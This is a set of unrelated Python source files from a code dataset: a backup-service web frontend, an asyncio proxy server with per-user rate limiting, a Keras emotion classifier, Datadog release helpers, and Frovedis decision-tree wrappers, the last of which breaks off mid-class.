            # and what the ID of that backing volume is
            if does_cmd_exist("kubectl") is False:
                return '{"status":"error_msg: cmd <kubectl> not found, please submit different source_type (e.g. rbd, cinder)"}'
            if (original_source_type == "kpvc"):
                # check the PVC, if that was passed in
                cmdStr = "kubernetes_utils/doesPVCexist.py " + original_source_id
                pvc_exists = subprocess.check_output(cmdStr.split()).strip("\n")
                if pvc_exists == "True":
                    pv = kubernetes_pvc_to_pv(original_source_id).strip("\n")
                    if len(pv) == 0:
                        return '{"status":"error_msg: no bound PV found for PVC <' + original_source_id + '>"}'
                else:
                    return '{"status":"error_msg: Kubernetes PVC <' + original_source_id + '> does not exist"}'
            # For a kpv request use the ID directly; for kpvc use the bound PV
            if (original_source_type == "kpv"):
                kpvid = original_source_id
            else:
                kpvid = pv
            cmdStr = "kubernetes_utils/doesPVexist.py " + kpvid
            pv_exists = subprocess.check_output(cmdStr.split()).strip("\n")
            if pv_exists == "True":
                cmdStr = "kubernetes_utils/isPVbackedbyRBD.py " + kpvid
                backedByRBD = subprocess.check_output(cmdStr.split()).strip("\n")
                if backedByRBD == "True":
                    source_type = "rbd"
                    source_id = kubernetes_pv_to_rbd(kpvid).strip("\n")
                else:
                    return '{"status":"error_msg: Kubernetes PV <' + kpvid + '> is not backed by RBD"}'
            else:
                return '{"status":"error_msg: Kubernetes PV <' + kpvid + '> does not exist"}'
        else:
            return '{"status":"error_msg: source_type <' + original_source_type + '> not supported"}'
        # Get the source and target profiles associated with this tenant
        src_script = "./builder_utils/get_src_id_from_sp_name"
        tgt_script = "./builder_utils/get_tgt_id_from_tenant_name"
        source_type_num = subprocess.check_output([src_script, source_type]).strip("\n")
        target_type_num = subprocess.check_output([tgt_script, tenant_id]).strip("\n")
        if len(source_type_num) == 0:
            return '{"status":"error_msg: source type <' + source_type + '> not configured"}'
        # Submit a new job to the Snappy Database
        if (source_type == "rbd"):
            # In cases where we don't have access to the rbd command, we can
            # still submit jobs, but the RBD volumes are not guaranteed to exist.
            # If this happens, the job would result in an error
            # Therefore it is preferred that the frontend has access to the RBD command
            rbd_verified = "false"
            if does_cmd_exist("rbd") is True:
                # If we do have access to the rbd command though, check to see that the volume exists
                cmd = "openstack_db_utils/does_rbd_volume_exist.py " + source_id
                cmd_output = subprocess.check_output(cmd.split())
                if "true" in cmd_output:
                    rbd_verified = "true"
                elif "unknown" in cmd_output:
                    pass
                else:
                    return '{"status":"error_msg: rbd volume <' + source_id + '> not found, will not submit backup request"}'
            # compose command to add new rbd backup job
            cmd_str = "./add_rbd_backup_single_scheduled_tenants "
            cmd_str += source_id + " "
            cmd_str += full_interval + " "
            cmd_str += count + " "
            cmd_str += str(source_type_num) + " "
            cmd_str += str(target_type_num) + " "
            cmd_str += original_source_type + " "
            cmd_str += original_source_id
            # execute command; the new job id is on the second-to-last line
            add_return_txt = subprocess.check_output(cmd_str.split())
            new_id = add_return_txt.split("\n")[-2]
            data['status'] = 'add request for RBD ID <' + source_id + '> submitted'
            data['rbd_verified'] = rbd_verified
            data['job_id'] = new_id
            data['full_interval'] = full_interval
            data['delta_interval'] = delta_interval
            data['count'] = count
        # compose command to add new localdirectory backup job
        elif (source_type == "localdirectory"):
            cmd_str = "./add_localdirectory_backup_single_scheduled_tenants "
            cmd_str += source_id + " "
            cmd_str += full_interval + " "
            cmd_str += count + " "
            cmd_str += str(source_type_num) + " "
            cmd_str += str(target_type_num) + " "
            cmd_str += original_source_type + " "
            cmd_str += original_source_id + " "
            # notes may contain spaces, so append them as a single argv entry
            cmd2 = cmd_str.split()
            notes_text = '"' + get_localdirectory_notes() + '"'
            cmd2.append(notes_text)
            # execute command
            add_return_txt = subprocess.check_output(cmd2)
            new_id = add_return_txt.split("\n")[-2]
            data['status'] = 'add request for localdirectory <' + source_id + '> submitted'
            data['job_id'] = new_id
            data['full_interval'] = full_interval
            data['delta_interval'] = delta_interval
            data['count'] = count
        else:
            data['status'] = 'ERROR: unknown backing source type <' + source_type + '>'
        add_return_txt = json.dumps(data)
        return add_return_txt
def isInt(s):
    ''' is this an integer '''
    # Conversion failure (non-numeric string) means "not an integer".
    try:
        int(s)
    except ValueError:
        return False
    return True
def isPosInt(i):
    ''' is this a positive integer '''
    # Short-circuit: only convert when isInt() already vouched for it.
    if not isInt(i):
        return False
    return int(i) > 0
def verify_list_input_v2(job_id):
    ''' Verity that the input is valid for a List Single request '''
    # Returns (is_good, list_output, job_id); list_output is a JSON error
    # payload that only matters when is_good is False.
    # initial values
    list_output = ""
    is_good = False
    data = {}
    # check to see if the job_id input is valid (is a positive integer)
    if not isPosInt(job_id):
        data['status'] = 'error_msg: job_id ' + job_id + ' is not valid'
    else:
        # check to see if the job_id exists, which is an error condition
        cmd_str = "snappy_db_utils/does_snappy_jobid_exist " + job_id
        job_exists_str = subprocess.check_output(cmd_str.split()).strip()
        # if there are no errors (the job_id exists if specified), change is_good to True
        # and return the inputs, else return False and an error message.
        # NOTE(review): '"no data" in job_id' can never be true here because
        # job_id has already passed isPosInt(); this was probably meant to
        # test job_exists_str instead -- confirm intent before changing.
        if len(job_exists_str) > 0 or "no data" in job_id:
            is_good = True
        else:
            data['status'] = 'error_msg: job_id ' + job_id + ' does not exist'
    list_output = json.dumps(data)
    return is_good, list_output, job_id
def does_tenant_exist(tenant_id):
    ''' Make sure the specified tenant exists '''
    info = subprocess.check_output(["./builder_utils/get_tenant_info", tenant_id])
    # Output shorter than 5 bytes means the lookup came back empty.
    return len(info) >= 5
class FullListV2All:
    ''' A Full list of all of the jobs in the Snappy DB '''
    def GET(self, tenant_id):
        ''' List is a GET command '''
        if does_tenant_exist(tenant_id) is False:
            return no_tenant_error(tenant_id)
        # job_id 0 means "all jobs"; HTML output unless the URL ends in ".txt"
        return describe_state_column(list_main(True, ".txt" not in web.ctx.path, 0))
def strip_suffix(string, suffix):
    ''' Strip off a suffix from a string '''
    # Guard against an empty suffix: every string endswith("") is True and
    # string[:-0] evaluates to '', which wiped out the whole input in the
    # original implementation.
    if suffix and string.endswith(suffix):
        return string[:-len(suffix)]
    return string
class FullListV2Single:
    ''' A Full list of a single job in the Snappy DB '''
    def GET(self, tenant_id, job_id):
        ''' List is a GET command '''
        if does_tenant_exist(tenant_id) is False:
            return no_tenant_error(tenant_id)
        # Allow plain-text URLs like /123.txt by dropping the extension.
        job_id = strip_suffix(job_id, ".txt")
        is_good, list_output, job_id = verify_list_input_v2(job_id)
        if is_good is True:
            # True selects the "full" (verbose) listing format.
            list_output = describe_state_column(list_main(True, ".txt" not in web.ctx.path, job_id))
        return list_output
class SummaryListV2All:
    ''' A Summary list of all of the jobs in the Snappy DB '''
    def GET(self, tenant_id):
        ''' List is a GET command '''
        if does_tenant_exist(tenant_id) is False:
            return no_tenant_error(tenant_id)
        # False selects the summary format; job_id 0 means "all jobs".
        return describe_state_column(list_main(False, ".txt" not in web.ctx.path, 0))
class SummaryListV2Single:
    ''' A summary list of one job in the Snappy DB '''
    def GET(self, tenant_id, job_id):
        ''' List is a GET command '''
        if does_tenant_exist(tenant_id) is False:
            return no_tenant_error(tenant_id)
        # Allow plain-text URLs like /123.txt by dropping the extension.
        job_id = strip_suffix(job_id, ".txt")
        is_good, list_output, job_id = verify_list_input_v2(job_id)
        if is_good is True:
            # False selects the summary (non-verbose) listing format.
            list_output = describe_state_column(list_main(False, ".txt" not in web.ctx.path, job_id))
        return list_output
def main():
    ''' main '''
    # Show detailed debug pages on internal errors (web.py development aid).
    web.internalerror = web.debugerror
    # APP is the web.py application object defined earlier in this file.
    APP.run()
if __name__ == "__main__":
    print("Snappy Frontend version " + VERSION)
    print("Frontend running with PID " + str(os.getpid()))
    # Record our PID so the service can be managed externally.
    # (was open/write/close; `with` guarantees the handle is closed)
    with open("frontend.pid", "w") as fd:
        fd.write(str(os.getpid()))
    # delete previous file for local Tables (default: "frontendTables.db")
    db_filename = os.environ['FRONTEND_DB_FILENAME']
    try:
        print("Removing old local DB file " + db_filename)
        os.remove(db_filename)
    except OSError:  # was a bare except; os.remove only raises OSError here
        print("The file " + db_filename + " did not exist")
    # start the sqLite database with the definitions set in the SQL dump file (default: "frontendTables.sql")
    #
    # Bash equivalent: sqlite3 frontendTables.db < frontendTables.sql
    #
    db_conn = sqlite3.connect(db_filename)
    db_sql_filename = os.environ['FRONTEND_DB_SQL_FILENAME']
    try:
        print("Trying to read from file " + db_sql_filename)
        fd = open(db_sql_filename, 'r')
        c = db_conn.cursor()
        script = fd.read()
        c.executescript(script)
        db_conn.close()
        fd.close()
    except Exception as e:
        # Fail fast: the frontend cannot run without its local tables.
        print("Exception: " + str(e))
        print("Could not read file " + db_sql_filename)
        print("Please check the value of FRONTEND_DB_SQL_FILENAME in file <env-snappy-fe.src>")
        print("")
        print("Exiting...")
        sys.exit(1)
    print("Created new local DB file " + db_filename)
    main()
| StarcoderdataPython |
3212932 | <gh_stars>0
'''
Copyright (c)2020, by Qogir, JMJ, MA71
All rights reserved.
File Name: LocalProxy
System Name: SwiftProxy
Date: 2020-12-01
Version: 1.0
Description: 远程代理服务器。该模块主要依赖aiosqlite和asyncio库。
'''
import aiosqlite
import asyncio
import json
import logging
import signal
import argparse
import collections
import traceback
from enum import Enum
ReadMode = Enum('ReadMod', ('EXACT', 'LINE', 'MAX', 'UNTIL'))  # the four read modes understood by aioRead
class MyError(Exception):  # custom exception class; raise instances to make errors easy to trace
    """Session-level error carrying a human-readable message for logging."""
    pass
async def aioClose(w, *, logHint=None):  # close the writer and log the peer address
    """Close a StreamWriter, tolerating a None writer and close failures."""
    if not w:
        # Nothing to close; tiny sleep keeps this an awaitable no-op.
        await asyncio.sleep(0.001)
        return
    host, port, *_ = w.get_extra_info('peername')
    log.info(f'{logHint} close {host} {port}')
    try:
        w.close()
        await w.wait_closed()
    except Exception as exc:
        # Best-effort close: errors here are deliberately ignored.
        pass
async def aioRead(r, mode, *, logHint=None, exactData=None, exactLen=None, maxLen=-1, untilSep=b'\r\n'):
    """Read from the stream in one of four modes; wrap failures in MyError."""
    data = None
    try:
        if ReadMode.EXACT == mode:  # read an exact number of bytes
            exactLen = len(exactData) if exactData else exactLen
            data = await r.readexactly(exactLen)
            if exactData and data != exactData:
                raise MyError(f'recvERR={data} {logHint}')
        elif ReadMode.LINE == mode:  # read a single line
            data = await r.readline()
        elif ReadMode.MAX == mode:  # read up to maxLen bytes
            data = await r.read(maxLen)
        elif ReadMode.UNTIL == mode:  # read until the separator is seen
            data = await r.readuntil(untilSep)
        else:
            log.error(f'INVALID mode={mode}')
            exit(1)
    except asyncio.IncompleteReadError as exc:
        raise MyError(f'recvEXC={exc} {logHint}')
    except ConnectionAbortedError as exc:
        raise MyError(f'recvEXC={exc} {logHint}')
    except ConnectionResetError as exc:
        raise MyError(f'recvEXC={exc} {logHint}')
    if not data:
        # Empty read means the peer closed the connection.
        raise MyError(f'EOF {logHint}')
    return data
async def aioWrite(w, data, *, logHint=''):
    """Write *data* to the stream and flush; wrap connection errors in MyError."""
    try:
        w.write(data)
        await w.drain()  # pairs with write(): flush the transport buffer now
    except ConnectionAbortedError as exc:
        raise MyError(f'sendEXC={exc} {logHint}')
    except ConnectionResetError as exc:
        # BUG FIX: this branch was labelled 'recvEXC' although it reports a
        # failure on the send path.
        raise MyError(f'sendEXC={exc} {logHint}')
User = collections.namedtuple('User', ['name', 'password', 'dataRate'])  # per-user record with named-field access
gUserDict = dict()  # users loaded from the sqlite database, keyed by name
gUserDictLock = asyncio.Lock()  # guards user-table access to avoid races
gLinkCount = 0  # number of simultaneous connections through the remote proxy
gLeakyBucketDict = dict()  # per-user token buckets for traffic shaping
class LeakyBucket:  # token bucket used for per-user rate limiting
    """Token bucket refilled once per second by tokenLeakTask()."""
    def __init__(self, tokenLimit):  # tokenLimit: the user's configured bytes/second
        self.tokenCount = tokenLimit  # tokens currently left in the bucket
        self.tokenLimit = tokenLimit
        self.tokenSemaphore = asyncio.BoundedSemaphore(1)  # serializes bucket access
    def __del__(self):  # drop the synchronization primitives on delete
        # NOTE(review): tokenLock is never set in __init__; this assignment
        # looks vestigial -- confirm before removing.
        self.tokenLock = None
        self.tokenSemaphore = None
    async def acquireToken(self, count):  # take up to `count` tokens
        await self.tokenSemaphore.acquire()  # P operation on the semaphore
        tokenCount = 0  # tokens consumed by this call
        tokenCount = min(self.tokenCount, count)  # may get fewer than requested
        self.tokenCount -= tokenCount
        if 0 < self.tokenCount:  # keep the semaphore held while the bucket is empty
            try:
                self.tokenSemaphore.release()  # V operation
            except ValueError:
                pass
        return tokenCount
    def releaseToken(self, count):  # put `count` tokens back
        self.tokenCount = min(self.tokenCount + count, self.tokenLimit)  # never exceed the limit
        try:
            self.tokenSemaphore.release()
        except ValueError:
            # BoundedSemaphore raises when already at its initial value.
            pass
async def doLocal(localR, localW):
    """Handle one connection from the local proxy: authenticate the user,
    connect to the requested destination and relay traffic both ways
    through the user's rate-limiting token bucket."""
    global gLinkCount
    gLinkCount += 1
    serverR, serverW = None, None
    # Initialize up-front so the except handlers below can always log it.
    logHint = 'doLocal'
    try:
        localHost, localPort, *_ = localW.get_extra_info('peername')
        logHint = f'{localHost} {localPort}'
        # Read the destination address plus user name/password sent by local.
        firstLine = await aioRead(localR, ReadMode.LINE, logHint=f'1stLine')
        firstDict = json.loads(firstLine.strip().decode())  # convert to dict
        dstHost = firstDict.get('dst')
        dstPort = firstDict.get('dport')
        username = firstDict.get('user')
        # BUG FIX: this line was corrupted ("password = <PASSWORD>('password')");
        # restored to the dict lookup matching the fields above.
        password = firstDict.get('password')
        if not dstHost or not dstPort or not username or not password:
            raise MyError(f'ErrorFirst')
        user = gUserDict.get(username)  # this user's row from the database
        if not user or user.password != password:  # unknown user or bad password
            raise MyError(f'authFail {username} {password}')
        tokenLimit = user.dataRate if user.dataRate else args.tokenLimit  # fall back to the CLI limit
        logHint = f'{logHint} {dstHost} {dstPort}'
        log.info(f'{logHint} connStart...')
        # Open the TCP connection to the destination server.
        serverR, serverW = await asyncio.open_connection(dstHost, dstPort)
        bindHost, bindPort, *_ = serverW.get_extra_info('sockname')
        log.info(f'{logHint} connSucc bind {bindHost} {bindPort}')
        gLinkCount += 1
        await aioWrite(localW, f'{bindHost} {bindPort}\r\n'.encode(), logHint='1stLine')  # tell local the bind succeeded
        if username not in gLeakyBucketDict:  # lazily create the user's token bucket
            gLeakyBucketDict[username] = LeakyBucket(tokenLimit)
        bucket = gLeakyBucketDict.get(username)
        await asyncio.wait({  # full-duplex relay via two concurrent tasks
            asyncio.create_task(xferData(bucket, localR, serverW, logHint=f'{logHint} fromLocal', upDirect=True)),
            asyncio.create_task(xferData(bucket, serverR, localW, logHint=f'{logHint} fromServer', upDirect=False))
        })
    except MyError as exc:
        log.info(f'{logHint} {exc}')
    except json.JSONDecodeError as exc:
        log.info(f'{logHint} {exc}')
    except OSError:
        log.info(f'{logHint} connFail')
    except ValueError as exc:
        log.info(f'{logHint} {exc}')
    except Exception as exc:
        log.error(f'{traceback.format_exc()}')
        exit(1)
    await aioClose(localW, logHint=logHint)
    await aioClose(serverW, logHint=logHint)
    gLinkCount -= 1
    if serverR:
        gLinkCount -= 1
async def remoteTask():  # main coroutine of the remote proxy
    """Start the background tasks and serve local-proxy connections forever."""
    asyncio.create_task(dbSyncTask())  # run concurrently with the server
    asyncio.create_task(tokenLeakTask())
    srv = await asyncio.start_server(doLocal, host=args.listenHost, port=args.listenPort)  # TCP server for local proxies
    addrList = list([s.getsockname() for s in srv.sockets])
    log.info(f'LISTEN {addrList}')
    async with srv:
        await srv.serve_forever()  # run until cancelled
async def dbSyncTask():  # keep gUserDict and gLeakyBucketDict in sync with the database
    """Reload the user table from sqlite once per second and refresh limits."""
    async with aiosqlite.connect(args.sqliteFile) as db:
        while True:
            await asyncio.sleep(1)  # resync once per second
            userDict = dict()
            async with db.execute("SELECT name,password,dataRate FROM user;") as cursor:  # run the query
                async for row in cursor:
                    userDict[row[0]] = User(row[0], row[1], row[2])  # keyed by username
            global gUserDict
            global gLeakyBucketDict
            gUserDict = userDict
            for name, user in gUserDict.items():  # name/user are the key/value pairs
                if name in gLeakyBucketDict:  # user already connected: refresh the bandwidth limit
                    gLeakyBucketDict[name].tokenLimit = user.dataRate if user.dataRate else args.tokenLimit
async def tokenLeakTask():  # background task that replenishes tokens
    """Refill every user's token bucket once per second."""
    while True:
        await asyncio.sleep(1)
        for username, bucket in gLeakyBucketDict.items():
            bucket.releaseToken(bucket.tokenLimit)  # add tokenLimit tokens each second
async def xferData(bucket, srcR, dstW, *, logHint=None, upDirect):  # one-directional relay; upDirect marks upstream traffic
    """Copy bytes from srcR to dstW, throttled by the token bucket if set."""
    try:
        while True:
            tokenCount = 65535
            if bucket:  # on the remote side a bucket limits the transfer rate
                tokenCount = await bucket.acquireToken(65535)  # a single read is at most 65535 bytes
            data = await aioRead(srcR, ReadMode.MAX, maxLen=tokenCount, logHint='')  # transfer as many bytes as we got tokens
            if bucket:
                leftToken = tokenCount - len(data)  # a short read leaves unused tokens
                if leftToken:
                    bucket.releaseToken(leftToken)  # return them to the bucket
            await aioWrite(dstW, data, logHint='')
    except MyError as exc:
        log.info(f'{logHint} {exc}')
    await aioClose(dstW, logHint=logHint)
if __name__ == '__main__':
    signal.signal(signal.SIGINT, signal.SIG_DFL)
    # Logging setup: timestamp, level initial, line number, function, message.
    _logFmt = logging.Formatter('%(asctime)s %(levelname).1s %(lineno)-3d %(funcName)-20s %(message)s', datefmt='%H:%M:%S')
    _consoleHandler = logging.StreamHandler()
    _consoleHandler.setLevel(logging.DEBUG)
    _consoleHandler.setFormatter(_logFmt)
    log = logging.getLogger(__file__)
    log.addHandler(_consoleHandler)
    log.setLevel(logging.DEBUG)
    # Command-line options for the remote proxy.
    _parser = argparse.ArgumentParser(description='remote Proxy')
    _parser.add_argument('-d', dest='sqliteFile', default='user.db', help='user database sqlite file')  # user DB filename
    _parser.add_argument('-l', dest='listenHost', default='192.168.43.227', help='proxy listen host default listen all interfaces')  # address to listen on
    _parser.add_argument('-p', dest='listenPort', type=int, default=8889, help='proxy listen port')
    _parser.add_argument('-t', dest='tokenLimit', type=int, default=999999, help='bytes/second per user')  # default bucket rate limit
    args = _parser.parse_args()
    asyncio.run(remoteTask())
| StarcoderdataPython |
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
from keras.utils.vis_utils import plot_model
def get_model_emotions(vocab_size, sequence_length, embedding_size):
    """Build and return the emotion-classification network.

    Architecture: Embedding -> SpatialDropout1D -> LSTM -> Dropout ->
    Dense(5, softmax); the final layer has 5 units, i.e. 5 emotion classes.
    """
    model=Sequential()
    model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
    model.add(SpatialDropout1D(0.15))
    model.add(LSTM(LSTM_units, recurrent_dropout=0.2))  # LSTM_units comes from config.py
    model.add(Dropout(0.3))
    model.add(Dense(5, activation="softmax"))
    model.summary()  # prints the layer table to stdout as a side effect
    # NOTE(review): plot_model needs pydot/graphviz installed -- confirm the
    # runtime environment has them, or this call raises.
    plot_model(model, to_file='model_plot.png', show_shapes=True, show_layer_names=True)
    return model
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import re
from .utils import get_version_file, load_manifest
from ..utils import read_file, read_file_lines, write_file, write_file_lines
from ..errors import ManifestError
# Maps the Python platform strings to the ones we have in the manifest
PLATFORMS_TO_PY = {
    'windows': 'win32',
    'mac_os': 'darwin',
    'linux': 'linux2',
}
ALL_PLATFORMS = sorted(PLATFORMS_TO_PY)  # manifest platform names, sorted for comparison
VERSION = re.compile(r'__version__ *= *(?:[\'"])(.+?)(?:[\'"])')  # captures the version literal in __about__.py
DATADOG_PACKAGE_PREFIX = 'datadog-'  # PyPI package prefix shared by every check
def get_release_tag_string(check_name, version_string):
    """
    Compose a string to use for release tags
    """
    # Tags look like "<check>-<version>", e.g. "nginx-1.2.0".
    return check_name + '-' + version_string
def update_version_module(check_name, old_ver, new_ver):
    """
    Change the Python code in the __about__.py module so that `__version__`
    contains the new value.
    """
    version_file = get_version_file(check_name)
    contents = read_file(version_file)
    # NOTE(review): this replaces EVERY occurrence of old_ver in the file,
    # not just the __version__ assignment (the VERSION regex defined above
    # is unused here) -- confirm __about__.py never contains the version
    # string elsewhere before relying on this.
    contents = contents.replace(old_ver, new_ver)
    write_file(version_file, contents)
def get_package_name(folder_name):
    """
    Given a folder name for a check, return the name of the
    corresponding Python package
    """
    # The base package is the one name that doesn't follow the prefix rule.
    if folder_name == 'datadog_checks_base':
        return 'datadog-checks-base'
    dashed = folder_name.replace('_', '-')
    return DATADOG_PACKAGE_PREFIX + dashed
def get_folder_name(package_name):
    """
    Given a Python package name for a check, return the corresponding folder
    name in the git repo
    """
    # The base package is the one name that doesn't follow the prefix rule.
    if package_name == 'datadog-checks-base':
        return 'datadog_checks_base'
    underscored = package_name.replace('-', '_')
    return underscored[len(DATADOG_PACKAGE_PREFIX):]
def get_agent_requirement_line(check, version):
    """
    Compose a text line to be used in a requirements.txt file to install a check
    pinned to a specific version.
    """
    package_name = get_package_name(check)
    # base check has no manifest
    if check == 'datadog_checks_base':
        return '{}=={}'.format(package_name, version)
    m = load_manifest(check)
    platforms = sorted(m.get('supported_os', []))
    # all platforms: no environment marker needed
    if platforms == ALL_PLATFORMS:
        return '{}=={}'.format(package_name, version)
    # one specific platform: positive sys_platform marker
    elif len(platforms) == 1:
        return "{}=={}; sys_platform == '{}'".format(
            package_name, version, PLATFORMS_TO_PY.get(platforms[0])
        )
    elif platforms:
        # Two of the three platforms: express it as "not the missing one".
        if 'windows' not in platforms:
            return "{}=={}; sys_platform != 'win32'".format(package_name, version)
        elif 'mac_os' not in platforms:
            return "{}=={}; sys_platform != 'darwin'".format(package_name, version)
        elif 'linux' not in platforms:
            return "{}=={}; sys_platform != 'linux2'".format(package_name, version)
    # Empty or unrecognized platform list: refuse rather than guess.
    raise ManifestError("Can't parse the `supported_os` list for the check {}: {}".format(check, platforms))
def update_agent_requirements(req_file, check, newline):
    """
    Replace the requirements line for the given check
    """
    package_name = get_package_name(check)
    lines = read_file_lines(req_file)
    for i, line in enumerate(lines):
        # The package name is everything before the '==' pin.
        current_package_name = line.split('==')[0]
        if current_package_name == package_name:
            lines[i] = '{}\n'.format(newline)
            break
    # The requirements file is kept sorted on disk.
    write_file_lines(req_file, sorted(lines))
| StarcoderdataPython |
#!/usr/bin/env python
from .model_util import *
from ..exrpc.rpclib import *
from ..exrpc.server import *
from ..matrix.ml_data import FrovedisLabeledPoint
from ..matrix.dtype import TypeUtil
from .metrics import *
import numpy as np
# Decision Tree Regressor Class
class DecisionTreeRegressor:
    "A python wrapper of Frovedis Decision Tree Regressor"
    """
    parameter               :  default value
    criterion or impurity   :  'mse'
    plitter                 :  'best'
    in_impurity_decrease    :  0.0
    in_samples_split        :  2
    min_samples_leaf        :  1
    in_weight_fraction_leaf :  0.0
    presort                 :  False
    verbose                 :  0
    """
    # defaults are as per Frovedis/scikit-learn
    # Decision Tree Regressor constructor
    # NOTE(review): 'cls' is used as the instance parameter throughout this
    # class where 'self' is conventional; binding still works as usual.
    def __init__(cls, criterion='mse', splitter='best',
                 max_depth=None, min_samples_split=2, min_samples_leaf=1,
                 min_weight_fraction_leaf=0.0, max_features=None, random_state=None,
                 max_leaf_nodes=1, min_impurity_decrease=0.0, min_impurity_split=None,
                 class_weight=None, presort=False,
                 min_info_gain = 0.0, max_bins = 32, verbose = 0):
        cls.criterion = criterion.upper()
        cls.splitter = splitter
        if max_depth is None: cls.max_depth = 5
        else: cls.max_depth = max_depth
        cls.min_samples_split = min_samples_split
        cls.min_samples_leaf = min_samples_leaf
        cls.min_weight_fraction_leaf = min_weight_fraction_leaf
        cls.max_features = max_features
        cls.random_state = random_state
        cls.max_leaf_nodes = max_leaf_nodes
        cls.min_impurity_decrease = min_impurity_decrease
        cls.min_impurity_split = min_impurity_split
        cls.class_weight = class_weight
        cls.presort = presort
        cls.verbose = verbose
        # extra: server-side model bookkeeping
        cls.__mid = None     # model id on the Frovedis server (None = not fitted)
        cls.__mdtype = None  # numeric dtype id of the fitted model
        cls.__mkind = M_KIND.DTM
        # Frovedis side parameters
        cls.min_info_gain = min_info_gain
        cls.max_bins = max_bins
        cls.algo = "Regression"
        cls.n_classes_ = 0  # regression: no classes
    #To validate the input parameters
    def validate(cls):
        """Raise ValueError for any hyper-parameter outside its valid range."""
        if cls.criterion != "MSE":
            raise ValueError("Invalid criterion for Decision Tree Regressor!")
        elif cls.max_depth < 0:
            raise ValueError("max depth can not be negative !")
        elif cls.min_info_gain < 0:
            raise ValueError("Value of min_info_gain should be greater than 0")
        elif cls.max_bins < 0:
            raise ValueError("Value of max_bin should be greater than 0")
        elif cls.n_classes_ < 0:
            raise ValueError("Value of number of classes should be +ve integer or zero!")
        elif cls.min_samples_leaf < 0:
            raise ValueError("Value of min_samples_leaf should be greater than 0!")
    # Fit Decision Tree Regressor according to X (input data), y (Label)
    def fit(cls, X, y):
        """Train on the Frovedis server; releases any previous model first."""
        cls.validate()
        cls.release()
        cls.__mid = ModelID.get()
        inp_data = FrovedisLabeledPoint(X,y)
        (X, y) = inp_data.get()
        dtype = inp_data.get_dtype()
        itype = inp_data.get_itype()
        dense = inp_data.is_dense()
        cls.__mdtype = dtype
        (host,port) = FrovedisServer.getServerInstance()
        # RPC to the Frovedis server: trains the tree remotely.
        rpclib.dt_train(host,port,X.get(),y.get(),
                        cls.algo.encode('ascii'), cls.criterion.encode('ascii'),
                        cls.max_depth, cls.n_classes_, cls.max_bins, cls.min_samples_leaf,
                        cls.min_info_gain, cls.verbose, cls.__mid,
                        dtype, itype, dense)
        excpt = rpclib.check_server_exception()
        if excpt["status"]: raise RuntimeError(excpt["info"])
        return cls
    # Perform prediction on an array of test vectors X.
    def predict(cls,X):
        if cls.__mid is not None:
            return GLM.predict(X,cls.__mid,cls.__mkind,cls.__mdtype,False)
        else:
            raise ValueError("predict is called before calling fit, or the model is released.")
    # Load the model from a file
    def load(cls,fname,dtype=None):
        """Load a saved model; dtype is required unless already known."""
        cls.release()
        cls.__mid = ModelID.get()
        if dtype is None:
            if cls.__mdtype is None:
                raise TypeError("model type should be specified for loading from file!")
        else: cls.__mdtype = TypeUtil.to_id_dtype(dtype)
        GLM.load(cls.__mid,cls.__mkind,cls.__mdtype,fname)
        return cls
    # Save model to a file
    def save(cls,fname):
        if cls.__mid is not None: GLM.save(cls.__mid,cls.__mkind,cls.__mdtype,fname)
    # calculate the root mean square value on the given test data and labels.
    def score(cls, X, y):
        # NOTE(review): silently returns None when called before fit() --
        # confirm whether raising (as predict() does) would be preferable.
        if cls.__mid is not None:
            return r2_score(y, cls.predict(X))
    # Show the model
    def debug_print(cls):
        if cls.__mid is not None: GLM.debug_print(cls.__mid,cls.__mkind,cls.__mdtype)
    # Release the model-id to generate new model-id
    def release(cls):
        if cls.__mid is not None:
            GLM.release(cls.__mid,cls.__mkind,cls.__mdtype)
            cls.__mid = None
    # Check FrovedisServer is up then release
    def __del__(cls):
        if FrovedisServer.isUP(): cls.release()
# Decision Tree Classifier Class
class DecisionTreeClassifier:
    """A python wrapper of Frovedis Decision Tree Classifier.

    parameter                : default value
    criterion or impurity    : 'gini'
    splitter                 : 'best'
    min_impurity_decrease    : 0.0
    min_samples_split        : 2
    min_samples_leaf         : 1
    min_weight_fraction_leaf : 0.0
    presort                  : False
    verbose                  : 0

    Defaults are as per Frovedis/scikit-learn. Several scikit-learn
    parameters (splitter, max_features, class_weight, ...) are accepted for
    API compatibility only; the Frovedis server uses criterion, max_depth,
    min_samples_leaf, min_info_gain and max_bins.
    """
    # Decision Tree Classifier constructor
    def __init__(cls, criterion='gini', splitter='best',
                 max_depth=None, min_samples_split=2, min_samples_leaf=1,
                 min_weight_fraction_leaf=0.0, max_features=None, random_state=None,
                 max_leaf_nodes=1, min_impurity_decrease=0.0, min_impurity_split=None,
                 class_weight=None, presort=False,min_info_gain=0.0,
                 max_bins=32,verbose=0):
        cls.criterion = criterion.upper()
        cls.splitter = splitter
        # Frovedis needs a concrete depth; 5 mirrors its default
        if max_depth is None: cls.max_depth = 5
        else: cls.max_depth = max_depth
        cls.min_samples_split = min_samples_split
        cls.min_samples_leaf = min_samples_leaf
        cls.min_weight_fraction_leaf = min_weight_fraction_leaf
        cls.max_features = max_features
        cls.random_state = random_state
        cls.min_impurity_decrease = min_impurity_decrease
        cls.min_impurity_split = min_impurity_split
        cls.class_weight = class_weight
        cls.max_leaf_nodes = max_leaf_nodes
        cls.presort = presort
        cls.verbose = verbose
        # extra: server-side model bookkeeping
        cls.__mid = None       # server model id; None => not fitted / released
        cls.__mdtype = None    # dtype id of the trained model
        cls.__mkind = M_KIND.DTM
        # Frovedis side parameters
        cls.min_info_gain = min_info_gain
        cls.max_bins = max_bins
        cls.algo = "Classification"
    def validate(cls):
        """Sanity-check hyper-parameters.

        Called from fit() after n_classes_ has been computed; calling it
        directly before fit() fails on the missing n_classes_ attribute.
        """
        if cls.criterion != "GINI" and cls.criterion != "ENTROPY":
            # bug fix: the message used to say "Regressor" in the classifier
            raise ValueError("Invalid criterion for Decision Tree Classifier!")
        elif cls.max_depth < 0:
            raise ValueError("max depth can not be negative !")
        elif cls.min_info_gain < 0:
            raise ValueError("Value of min_info_gain should be greater than 0")
        elif cls.max_bins < 0:
            raise ValueError("Value of max_bin should be greater than 0")
        elif cls.min_samples_leaf < 0:
            raise ValueError("Value of min_samples_leaf should be greater than 0!")
        elif cls.n_classes_ < 0:
            raise ValueError("Value of number of classes should be +ve integer or zero!")
    # Fit Decision Tree classifier according to X (input data), y (Label)
    def fit(cls, X, y):
